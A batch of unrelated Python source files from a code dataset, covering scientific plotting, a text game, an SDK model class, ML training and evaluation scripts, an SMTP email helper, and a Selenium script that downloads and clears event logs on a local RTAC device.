range(a,b):\n bl.append(array[i])\n return bl\n\n#Get distance between two atoms\ndef distance(ind1, ind2): #gets index list starting from 1, gives d for index list starting from 0!\n ind1 = ind1 - 1\n ind2 = ind2 - 1\n atom1 = u.select_atoms('index '+str(ind1))\n atom2 = u.select_atoms('index '+str(ind2))\n delta = atom2.positions[0]-atom1.positions[0]\n r12 = math.sqrt(delta[0]**2+delta[1]**2+delta[2]**2)\n return r12\n\n#Count contacts in one frame\ndef count_contacts():\n n = 0\n for i in range(len(contacts)):\n ind1 = int(contacts[i][0]); ind2 = int(contacts[i][1])\n if distance(ind1, ind2)/10 < 2*(float(contacts[i][3])):\n n += 1\n return n\n\n#calculates sigma from d\ndef get_const(ind1, ind2):\n sigma = distance(ind1, ind2)/((2)**(1/6))\n #C6 = 4*9.414*sigma**6; C12 = 4*9.414*sigma**12\n #return C6, C12\n return sigma\n\n#------------------MAIN----------------------------\n\npairs_array = get_file_string_array('Protein_A.itp')\ncontacts = get_blocks(pairs_array, 'pairs')\n\n\ntime = []\ncontacts_trj = []\n\nfor tes in u.trajectory:\n contacts_trj.append(count_contacts())\n time.append(u.trajectory.time/1000)\n\n\nfig, ax = plt.subplots()\n\nax.plot(time, contacts_trj, '--', color='black', linewidth=2)\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.spines['left'].set_linewidth(2)\nax.spines['bottom'].set_linewidth(2)\nax.tick_params(width=3, labelsize=13)\nfig.savefig(\"plot.png\", format='png', dpi=600)\nprint('plot.png saved to working directory')\n","sub_path":"show_contacts.py","file_name":"show_contacts.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"650792004","text":"from Dungeon import Dungeon\nfrom Commands import Command\n\n\n\nclass SUD:\n def __init__(self):\n self.myDungeon = 0\n self.commands = 0\n\n def Run(self):\n self.myDungeon = Dungeon()\n self.commands = Command()\n self.myDungeon.Init()\n\n while True:\n self.Process()\n\n def Process(self):\n self.myDungeon.DisplayCurrentRoom()\n\n key = input(\"-\")\n\n user_input = key.split(' ')\n\n user_input = [x for x in user_input if x != '']\n\n if user_input[0].lower() == 'help':\n print(\"HELP!!\")\n elif user_input[0].lower() == 'go':\n if self.myDungeon.isValidMove(user_input[1].lower()):\n self.myDungeon.Move(user_input[1].lower())\n else:\n self.handleBadInput()\n else:\n self.handleBadInput()\n\n def handleBadInput(self):\n print(\"\\nERROR\")\n print(\"Press any key to continue\")\n input()\n\n\nif __name__ == '__main__':\n sud = SUD()\n sud.Run()\n","sub_path":"MUD/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"570552692","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass CreateTestCaseRequestBody:\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'name': 'str',\n 'service_id': 'int',\n 'rank_id': 'str',\n 'testcase_number': 'str',\n 'extend_info': 'ExternalServiceCaseInfo'\n }\n\n attribute_map = {\n 'name': 'name',\n 'service_id': 'service_id',\n 'rank_id': 'rank_id',\n 'testcase_number': 'testcase_number',\n 'extend_info': 'extend_info'\n }\n\n def __init__(self, name=None, service_id=None, rank_id=None, testcase_number=None, extend_info=None):\n \"\"\"CreateTestCaseRequestBody\n\n The model defined in huaweicloud sdk\n\n :param name: 页面上显示的用例名称,长度为[3-128]位字符\n :type name: str\n :param service_id: 该值由注册接口返回,取值范围为10-9999\n :type service_id: int\n :param rank_id: 测试用例等级,可选值为[0,1,2,3,4],不填时默认为2\n :type rank_id: str\n :param testcase_number: 用例编号,不填该值时会自动生成,长度为[3-128]位字符\n :type testcase_number: str\n :param extend_info: \n :type extend_info: :class:`huaweicloudsdkcloudtest.v1.ExternalServiceCaseInfo`\n \"\"\"\n \n \n\n self._name = None\n self._service_id = None\n self._rank_id = None\n self._testcase_number = None\n self._extend_info = None\n self.discriminator = None\n\n self.name = name\n self.service_id = service_id\n if rank_id is not None:\n self.rank_id = rank_id\n if testcase_number is not None:\n self.testcase_number = testcase_number\n if extend_info is not None:\n self.extend_info = extend_info\n\n @property\n def name(self):\n \"\"\"Gets the name of this CreateTestCaseRequestBody.\n\n 页面上显示的用例名称,长度为[3-128]位字符\n\n :return: The name of this CreateTestCaseRequestBody.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this CreateTestCaseRequestBody.\n\n 页面上显示的用例名称,长度为[3-128]位字符\n\n :param name: The name of this CreateTestCaseRequestBody.\n :type name: str\n \"\"\"\n self._name = name\n\n @property\n def service_id(self):\n \"\"\"Gets the service_id of this CreateTestCaseRequestBody.\n\n 该值由注册接口返回,取值范围为10-9999\n\n :return: The service_id of this CreateTestCaseRequestBody.\n :rtype: int\n \"\"\"\n return self._service_id\n\n @service_id.setter\n def service_id(self, service_id):\n \"\"\"Sets the service_id of this CreateTestCaseRequestBody.\n\n 该值由注册接口返回,取值范围为10-9999\n\n :param service_id: The service_id of this CreateTestCaseRequestBody.\n :type service_id: int\n \"\"\"\n self._service_id = service_id\n\n @property\n def rank_id(self):\n \"\"\"Gets the rank_id of this CreateTestCaseRequestBody.\n\n 测试用例等级,可选值为[0,1,2,3,4],不填时默认为2\n\n :return: The rank_id of this CreateTestCaseRequestBody.\n :rtype: str\n \"\"\"\n return self._rank_id\n\n @rank_id.setter\n def rank_id(self, rank_id):\n \"\"\"Sets the rank_id of this CreateTestCaseRequestBody.\n\n 测试用例等级,可选值为[0,1,2,3,4],不填时默认为2\n\n :param rank_id: The rank_id of this CreateTestCaseRequestBody.\n :type rank_id: str\n \"\"\"\n self._rank_id = rank_id\n\n @property\n def testcase_number(self):\n \"\"\"Gets the testcase_number of this CreateTestCaseRequestBody.\n\n 用例编号,不填该值时会自动生成,长度为[3-128]位字符\n\n :return: The testcase_number of this CreateTestCaseRequestBody.\n :rtype: str\n \"\"\"\n return self._testcase_number\n\n @testcase_number.setter\n def testcase_number(self, testcase_number):\n \"\"\"Sets the testcase_number of this CreateTestCaseRequestBody.\n\n 用例编号,不填该值时会自动生成,长度为[3-128]位字符\n\n :param testcase_number: The testcase_number of this CreateTestCaseRequestBody.\n :type testcase_number: str\n \"\"\"\n self._testcase_number = testcase_number\n\n @property\n def extend_info(self):\n \"\"\"Gets the extend_info of this CreateTestCaseRequestBody.\n\n :return: The extend_info of this CreateTestCaseRequestBody.\n :rtype: :class:`huaweicloudsdkcloudtest.v1.ExternalServiceCaseInfo`\n \"\"\"\n return self._extend_info\n\n @extend_info.setter\n def extend_info(self, extend_info):\n \"\"\"Sets the extend_info of this CreateTestCaseRequestBody.\n\n :param extend_info: The extend_info of this CreateTestCaseRequestBody.\n :type extend_info: :class:`huaweicloudsdkcloudtest.v1.ExternalServiceCaseInfo`\n \"\"\"\n self._extend_info = extend_info\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, CreateTestCaseRequestBody):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"huaweicloud-sdk-cloudtest/huaweicloudsdkcloudtest/v1/model/create_test_case_request_body.py","file_name":"create_test_case_request_body.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"11577084","text":"#!/usr/bin/python\n\nimport argparse\nimport glob\nimport re\nimport numpy as np\nfrom collections import defaultdict\nimport ipdb\n\ndef recog_file(filename, ground_truth_path, stats, exclude_bg=False):\n\n # read ground truth\n gt_file = ground_truth_path + re.sub('.*/','/',filename) + '.txt'\n with open(gt_file, 'r') as f:\n ground_truth = f.read().split('\\n')[0:-1]\n f.close()\n # read recognized sequence\n with open(filename, 'r') as f:\n recognized = f.read().split(' ')\n # recognized = # framelevel recognition is in 6-th line of file\n f.close()\n\n # print('recognized', len(recognized), 'groundtruth', len(ground_truth))\n\n n_frame_errors = 0\n for i in range(len(recognized)):\n if ground_truth[i] == \"SIL\" and exclude_bg:\n continue\n if not recognized[i] == ground_truth[i]:\n n_frame_errors += 1\n\n ground_truth = np.array(ground_truth)\n recognized = np.array(recognized)\n\n unique = set(np.unique(ground_truth)).union(set(np.unique(recognized)))\n for i in unique:\n if exclude_bg and i == \"SIL\":\n continue\n\n recog_mask = recognized == i\n gt_mask = ground_truth == i\n union = np.logical_or(recog_mask, gt_mask).sum()\n intersect = np.logical_and(recog_mask, gt_mask).sum() # num of correct prediction\n\n stats[i][0] = stats[i][0] + intersect\n stats[i][1] = stats[i][1] + recog_mask.sum()\n stats[i][2] = stats[i][2] + gt_mask.sum()\n stats[i][3] = stats[i][3] + union\n\n return n_frame_errors, len(recognized)\n\n\n### MAIN #######################################################################\n\n### arguments ###\n### --recog_dir: the directory where the recognition files from inferency.py are placed\n### --ground_truth_dir: the directory where the framelevel ground truth can be found\nparser = argparse.ArgumentParser()\nparser.add_argument('--recog_dir', required=True)\nparser.add_argument('--ground_truth_dir', required=True)\nparser.add_argument('--exclude_bg', action=\"store_true\")\nargs = parser.parse_args()\n\nfilelist = glob.glob(args.recog_dir + '/*')\n# filelist = [ f for f in filelist if \"action\" not in f ]\n\nprint('RECOG', args.recog_dir, '\\nGT', args.ground_truth_dir)\n\nprint('Evaluate %d video files...' % len(filelist))\n\nn_frames = 0\nn_errors = 0\nstats = defaultdict(lambda : [0, 0, 0, 0])\n# loop over all recognition files and evaluate the frame error\nfor filename in filelist:\n errors, frames = recog_file(filename, args.ground_truth_dir, stats, args.exclude_bg)\n n_errors += errors\n n_frames += frames\n\n\nP = np.array([ s[0] / s[1] for s in stats.values() ])\nR = np.array([ s[0] / s[2] for s in stats.values() ])\nP[np.isnan(P)] = 0\nR[np.isnan(R)] = 0\nF = (2*P*R)/(P+R+1e-6)\nJaccard = [ s[0] / s[3] for s in stats.values() ]\nprint('frame accuracy: %f' % (1.0 - float(n_errors) / n_frames))\nprint('number total frames: %d' % (n_frames))\nprint(\"P %.4f R %.4f F1 %.4f\" % (np.mean(P), np.mean(R), np.mean(F)))\nprint(\"Jaccard %.4f\" % np.mean(Jaccard) )\n\n","sub_path":"full_eval.py","file_name":"full_eval.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"151330847","text":"# Printing all the characters that match the \\d regex. \n# It is ways beyond the regular 0-9 from the ASCII table.\n\nimport re\n\nfor i in range(32, 10_000):\n ch = chr(i)\n # Use the re.ASCII flag to limit the \\d to 0-9 only\n if re.match('\\d', ch, re.ASCII):\n print(ch, end='')\nprint('')\n\nfor i in range(32, 10_000):\n ch = chr(i)\n if re.match('[$.0-9A-Za-z[]', ch, re.ASCII):\n print(ch, end='')\nprint('')\n\nfor i in range(32, 256):\n ch = chr(i)\n if re.match('[^a-zA-Z]', ch):\n print(ch, end='')\nprint('')\n","sub_path":"day4/16-digits.py","file_name":"16-digits.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"59289781","text":"import smtplib\nimport mimetypes\nimport email\nimport email.mime.text\nimport email.mime.application\nimport email.mime.multipart\n\nclass EmailClient:\n \"\"\"A simple email client class\"\"\"\n\n def __init__(self, host, port, usr, pwd):\n self.host = host\n self.port = port\n self.usr = usr\n self.pwd = pwd\n\n def sendpdf(self, subject, body, to_addr, filepath):\n response=''\n server=''\n msg = email.mime.multipart.MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = self.usr\n msg['To'] = to_addr\n msg.attach(email.mime.text.MIMEText(body))\n fp=open(filepath,'rb')\n att = email.mime.application.MIMEApplication(fp.read(),_subtype=\"pdf\")\n fp.close()\n att.add_header('Content-Disposition','attachment',filename='Franc-debitorder-mandate.pdf')\n msg.attach(att)\n try: \n server = smtplib.SMTP_SSL(self.host,self.port)\n server.login(self.usr,self.pwd) \n result = server.sendmail(self.usr, to_addr, msg.as_string())\n print('SENDPDF Success')\n response = {'status':1,'message':'Sent','details':result}\n except Exception as ex:\n err = \"SENDPDF ERROR: {0}\".format(ex)\n print(err)\n response = {'status':0,'message':'Error','details':err}\n finally:\n if (server):\n server.quit()\n # print(response)\n return response\n\n def sendemail(self, subject, msg, to_addr):\n response=''\n server=''\n header = 'From: {0}\\n'.format(self.usr)\n header += 'To: {0}\\n'.format(to_addr)\n header += 'Subject: {0}\\n\\n'.format(subject)\n try: \n # msg = msg.replace( u'\\u2018', u\"'\") \n # msg = msg.replace( u'\\u2013', u\"'\")\n # msg = msg.replace( u'\\u2019', u\"'\") \n # msg = msg.replace( u'\\u201c', u'\"') \n # msg = msg.replace( u'\\u201d', u'\"') \n msg.encode('ascii')\n message = header + msg\n server = smtplib.SMTP_SSL(self.host,self.port)\n server.login(self.usr,self.pwd) \n result = server.sendmail(self.usr, to_addr, message)\n response = {'status':1,'message':'Sent','details':to_addr} \n except Exception as ex: \n err = \"ERROR: {0}\".format(ex)\n response = {'status':0,'message':'Error','details':err}\n finally:\n if (server):\n server.quit()\n # print(response)\n return response\n\n def payment(self, result, amount, frequency):\n response=''\n server=''\n header = 'From: {0}\\n'.format(self.usr)\n header += 'To: {0}\\n'.format(result['email'])\n header += 'Subject: Franc: Payment instructions\\n\\n'\n try: \n body = \"Hi {0},\\n\\nWell done on investing R {1} on a {2} basis with Franc!\\n\\n\" \\\n \"Using your banking app or online banking portal setup a payment with the following details:\\n\\n\" \\\n \"\\t Recipient: {3}\\n\" \\\n \"\\t Bank: {4}\\n\" \\\n \"\\t Account: {5}\\n\" \\\n \"\\t Branch: {6}\\n\" \\\n \"\\t Reference: {7}\\n\" \\\n \"\\t Amount: {1}\\n\" \\\n \"\\t Frequency: {2}\\n\\n\" \\\n \"As soon as we receive your payment with reference {7} we will let you know. \" \\\n \"You can check the status of your contribution via the Franc app.\\nKeep Saving,\\nFranc\".format(\n result['firstname'], amount, frequency, result['label'],\n result['bank'], result['accno'], result['branch'],\n result['promocode'])\n body.encode('ascii')\n message = header + body\n server = smtplib.SMTP_SSL(self.host,self.port)\n server.login(self.usr,self.pwd) \n result = server.sendmail(self.usr, to_addr, message)\n response = {'status':1,'message':'Sent','details':to_addr} \n except Exception as ex: \n err = \"ERROR: {0}\".format(ex)\n response = {'status':0,'message':'Error','details':err}\n finally:\n if (server):\n server.quit()\n return response ","sub_path":"server/emailclient.py","file_name":"emailclient.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"487398606","text":"# Challenge: Modules, Classes, Error Handling, and List Comprehensions\n# https://www.dataquest.io/mission/187/challenge-modules-classes-error-handling-and-list-comprehensions\n\n# 2\nimport csv\n# data öffnen und einlesen\nf = open(\"nfl-suspensions-data.csv\", \"r\")\nnfl_suspensions = list(csv.reader(f))\n# header der datei cutten\nnfl_suspensions = nfl_suspensions[1:]\n# frequenz der jahre analysiern\nyears = {}\nfor row in nfl_suspensions:\n row_year = row[5]\n if row_year in years:\n years[row_year] += 1\n else:\n years[row_year] = 1\nprint(years)\n\n# 3\n# find unique teams\nteam_list = []\nfor row in nfl_suspensions:\n row_team = row[1]\n team_list.append(row_team)\nunique_teams = set(team_list)\n# find unique games as list comprehension\ngames_list = [row[2] for row in nfl_suspensions]\nunique_games = set(games_list)\n# print both unique sets\nprint(unique_teams)\nprint(unique_games)\n\n\n# 4\n'''\n# Suspension class ro represent each NFL suspension\nclass Suspension():\n def __init__(self,row):\n self.name = row[0]\n self.team = row[1]\n self.games = row[2]\n self.year = row[5]\n# create class instance: Classcall(dateiname[zeilenposition])\nthird_suspension = Suspension(nfl_suspensions[3])\n'''\n\n# 5\n# tweaking of Suspension class for error handling and extended functionality\nclass Suspension():\n def __init__(self,row):\n self.name = row[0]\n self.team = row[1]\n self.games = row[2]\n try:\n self.year = int(row[5])\n except Exception:\n self.year = 0\n # create method\n def get_year(self):\n return self.year\n\n# create class instance: Classcall(dateiname[zeilenposition])\nmissing_year = Suspension(nfl_suspensions[22])\ntwenty_third_year = missing_year.get_year()","sub_path":"m187/m187.py","file_name":"m187.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"543426965","text":"participents = {\n 'Martin': {'year': 1976, 'height': 180, 'education': ['VS', 'Gym', 'Uni']},\n 'Harald': 1970,\n 'Gerald': 1973,\n 'RolandW': 1998,\n 'Christoph': 1981,\n 'RolandS': {'year': 1974, 'education': ['VS', 'Gym', 'Uni']},\n}\n\nfor name in participents:\n print(participents[name])\n\nfor name, data in participents.items():\n print(name, data)\n ","sub_path":"iterate-dict.py","file_name":"iterate-dict.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"333279077","text":"# coding=utf-8\n\"\"\"\nLorum ipsum\n\nUsage:\n status_all_git_folders1.py [options] \n\nOptions:\n -h --help Show this screen.\n\nauthor : rabshakeh (erik@a8.nl)\nproject : git_utils\ncreated : 04-06-15 / 14:32\n\"\"\"\nfrom arguments import Arguments\n\n\ndef main():\n \"\"\"\n main\n \"\"\"\n arguments = Arguments(__doc__)\n print(arguments)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"status_all_git_folders1.py","file_name":"status_all_git_folders1.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"399012939","text":"import csv\nimport numpy as np\nimport cv2\nimport pickle\nimport joblib\nimport os\nfrom random import shuffle\nimport sklearn\n\n\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n batch_size = int(batch_size / 6)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n angles = []\n for batch_sample in batch_samples:\n for i in range(3):\n source_path = batch_sample[i].strip()\n filename = source_path.split('/')[-1]\n current_path = 'data/IMG/' + filename\n im_cv = cv2.imread(current_path)\n im_rgb = cv2.cvtColor(im_cv, cv2.COLOR_BGR2RGB)\n # im_rgb = im_cv\n # Crop image\n # image = image[60:140,:,:]\n # Normalize image\n # image = image.astype('float32')\n # image = image / 255.0 - 0.5\n measurement = float(batch_sample[3])\n if i == 1:\n measurement += 0.2\n elif i == 2:\n measurement -= 0.2\n images.append(im_rgb)\n angles.append(measurement)\n images.append(cv2.flip(im_rgb, 1))\n angles.append(measurement*-1.0)\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# if os.path.exists(\"training_data.p\"):\n# print(\"Training data is dumped already\")\n# training_data = joblib.load(\"training_data.p\", mmap_mode=None)\n# X_train, y_train = training_data\n# else:\nlines = []\nwith open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n lines.append(line)\n\nfor i in range(10):\n print(\"First line of csv file\", lines[i])\n# lines.pop(0)\n# print(\"after\", lines[0])\n\nfrom sklearn.model_selection import train_test_split\ntrain_samples, validation_samples = train_test_split(lines, test_size=0.2)\n\n# print(\"current_path\", current_path)\n# joblib.dump(training_data, \"training_data.p\")\n\n# Set our batch size\nbatch_size=32\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = generator(validation_samples, batch_size=batch_size)\n\n\nfrom keras.layers import Input, Lambda, Cropping2D, Dense, GlobalAveragePooling2D, Flatten\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.models import Model\nimport tensorflow as tf\n\n\nsize_cropped = 90\n# Using Inception with ImageNet pre-trained weights\ninception = InceptionV3(weights='imagenet', include_top=False,\n input_shape=(size_cropped, 320, 3))\n# Freeze what already trained\nfor layer in inception.layers:\n layer.trainable = False\n\n# Input layer\n# image_input = Input(shape=(160, 320, 3))\nimage_input = Input(shape=(160, 320, 3))\n\n# Cropping layer\ncropped_input = Cropping2D(cropping=((50,20), (0,0)), input_shape=(160,320,3))(image_input)\n\n# Lambda layer (normalization)\nresized_input = Lambda(lambda pixel: (pixel / 255.0 - 0.5)*2.0, input_shape=(size_cropped,320,3))(cropped_input)\n\n# Inception V3 layers\ninp = inception(resized_input)\n\n\n# Global average pooling layer\nglob_avg_pool = GlobalAveragePooling2D()(inp)\n# glob_avg_pool = inp\n\n# Fully connected layer\n# Activation should be None, otherwise no negative steering values will be allowed\nDense_layer1 = Dense(100, activation='relu' )(glob_avg_pool)\n\nDense_layer2 = Dense(50, activation='relu' )(Dense_layer1)\n\nDense_layer3 = Dense(10, activation='relu' )(Dense_layer2)\n\n# Dense_layer1 = Dense(100 )(glob_avg_pool)\n#\n# Dense_layer2 = Dense(50)(Dense_layer1)\n#\n# Dense_layer3 = Dense(10)(Dense_layer2)\n\n# Output layer (fully connected layer)\npredictions = Dense(1, activation=None)(Dense_layer3)\n\n# model = Model(inputs=inception_input, outputs=predictions)\nmodel = Model(inputs=image_input, outputs=predictions)\n\n# Configure the model\nmodel.compile(optimizer='adam', loss='mse')\n\nprint(model.summary())\n# print(inception.summary())\n\n\nfrom keras.callbacks.callbacks import ModelCheckpoint, EarlyStopping\n# checkpoint = ModelCheckpoint(filepath='model.h5', monitor='val_loss', save_best_only=True)\n# stopper = EarlyStopping(monitor='val_accuracy', min_delta=0.0003, patience=5)\nfrom math import ceil\nhistory_object = model.fit_generator(train_generator,\n steps_per_epoch=ceil(len(train_samples)/batch_size),\n validation_data=validation_generator,\n validation_steps=ceil(len(validation_samples)/batch_size),\n# callbacks=[checkpoint, stopper],\n epochs=3,\n verbose=1)\n\n\nmodel.save('model_InceptionV3.h5')\n\n# model.add(Flatten())\n# model.add(Dense(100))\n# model.add(Dense(50))\n# model.add(Dense(10))\n# model.add(Dense(1))\n# model.compile(loss='mse', optimizer='adam')\n# model.fit(X_train, y_train, validation_split=0.2, shuffle=True, nb_epoch=7)\n# model.save('model.h5')\n#\n\n\nimport matplotlib.pyplot as plt\n\n### print the keys contained in the history object\nprint(history_object.history.keys())\n\n### plot the training and validation loss for each epoch\nplt.plot(history_object.history['loss'])\nplt.plot(history_object.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n","sub_path":"InceptionV3.py","file_name":"InceptionV3.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"133048666","text":"from datetime import date\nano = int(input('Digite o ano de seu nascimento:'))\natual = date.today().year\nidade = atual - ano\nif idade <= 9:\n print('MIRIM')\nelif 10 <= idade <= 14:\n print('INFANTIL')\nelif idade >= 15 and idade <= 19:\n print('JUNIOR')\nelif idade > 19 and idade < 25:\n print('SENIOR')\nelse:\n print('MASTER')","sub_path":"ExPython/CursoemVideo/ex041.py","file_name":"ex041.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"329354362","text":"# Python Selenium Test\r\n# Dependencies: Python 3.6 or newer, Selenium, Google Chrome, Chromedriver\r\n\r\n## THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY EXPRESSED OR IMPLIED WARRANTIES,\r\n## INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\r\n## AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\r\n## REGENTS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\r\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED\r\n## TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\r\n## PROFITS; OR BUSINESS INTERRUPTION)\r\n##\r\n## HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\r\n## LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\r\n## OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\r\n## DAMAGE.\r\n\r\n# Import libraries\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\n\r\n# Master variables\r\nuser = \"admin\" # Username of target RTAC\r\npw = \"Asdf123$\" # Password of target RTAC\r\nIP = \"https://192.168.1.2\" #IP address of target RTAC\r\n\r\n# Welcome user\r\nprint(\"This is a script to automate SOE downloads.\")\r\nprint(\"Script is active and running...\")\r\n\r\n# Activate Selenium\r\n# Chromedriver must be in a known location so that this program can use it.\r\ndriver = webdriver.Chrome(\"C:/Users/Joe Stanley/Desktop/Python Examples/chromedriver.exe\")\r\ndriver.get(IP) # Open webpage\r\n\r\n# Login\r\nelem = driver.find_element_by_id(\"username\")\r\nelem.send_keys(user)\r\nelem = driver.find_element_by_id(\"txtPassword\")\r\nelem.send_keys(pw)\r\nelem.send_keys(Keys.RETURN)\r\n\r\n# Wait for load\r\ntime.sleep(15)\r\n\r\n# Navigate to SOE page\r\nreportLinks = driver.find_element_by_xpath(\"//li[contains(.,'SOE')]\").click()\r\ntime.sleep(3)\r\n\r\n#NOTE: Filtering only applies to web, filtering isn't applied to downloads.\r\n#NOTE: Deleting entries after a filter is applied, then reseting filters\r\n# to download remaining entries may be an option if filtered downloads\r\n# are desired.\r\n# Filter SOE table\r\n# Filter 1\r\ndropDwn1 = driver.find_element_by_id(\"column1\")\r\ndropDwn1.send_keys(\"Tag Name\")\r\nfilterBox1 = driver.find_element_by_id(\"filter1\")\r\nfilterBox1.send_keys(\"*Logged*\")\r\n# And/Or\r\nandor = driver.find_element_by_id(\"oper1\")\r\nandor.send_keys(\"And\")\r\n# Filter 2\r\ndropDwn2 = driver.find_element_by_id(\"column2\")\r\ndropDwn2.send_keys(\"Tag Name\")\r\nfilterBox2 = driver.find_element_by_id(\"filter2\")\r\nfilterBox2.send_keys(\"*On*\")\r\n# Apply Filter\r\nfilterNow = driver.find_element_by_xpath(\"//*[@value='Filter']\").click()\r\ntime.sleep(3) # Wait 3 seconds to show that filtering was applied\r\n# Delete \"Undesired Entries\"\r\ndeleteSoe = driver.find_element_by_id(\"actions_dropdown\")\r\ndeleteSoe.send_keys(\"Delete\")\r\n# Reset Filter\r\nfilterOff = driver.find_element_by_xpath(\"//*[@value='Reset']\").click()\r\n\r\n\r\n# Download SOE csv file\r\ndownloadCSV = driver.find_element_by_id(\"download_csv_btn\").click()\r\n\r\n# Wait to delete until download is complete\r\ntime.sleep(45)\r\n\r\n# Delete all SOE logs on visible page (most recent 100 in log)\r\nselectAll = driver.find_element_by_id(\"soe_table_select_all\").click()\r\ndeleteSoe = driver.find_element_by_id(\"actions_dropdown\")\r\ndeleteSoe.send_keys(\"Delete\")\r\n\r\n# Wait to close webpage\r\ntime.sleep(5)\r\n\r\n# Close webpage\r\ndriver.close()\r\n\r\n# Send off user\r\nprint(\"SOE Log has been downloaded.\")\r\nprint(\"Goodbye.\")\r\n\r\n# Wait to finish program\r\ntime.sleep(2)\r\n","sub_path":"Selenium_SOE_Download_Demonstration.py","file_name":"Selenium_SOE_Download_Demonstration.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"391003825","text":"from amset.core import Amset\nimport os\n\nif __name__ == \"__main__\":\n # user inputs:\n use_single_parabolic_band = False\n\n # setting up the inputs:\n model_params = {\"bs_is_isotropic\": True,\n \"elastic_scatterings\": [\"ACD\", \"IMP\", \"PIE\"],\n \"inelastic_scatterings\": [\"POP\"]}\n performance_params = {\"max_nbands\": 1,\n \"interpolation\": \"boltztrap1\",\n \"dos_kdensity\": 600\n }\n if use_single_parabolic_band:\n effective_mass = 0.25\n model_params[\"poly_bands\"]= [[[[0.0, 0.0, 0.0], [0.0, effective_mass]]]]\n\n GaAs_params = {\"epsilon_s\": 12.9,\n \"epsilon_inf\": 10.9,\n \"W_POP\": 8.73,\n \"C_el\": 139.7,\n \"E_D\": {\"n\": 8.6, \"p\": 8.6},\n \"P_PIE\": 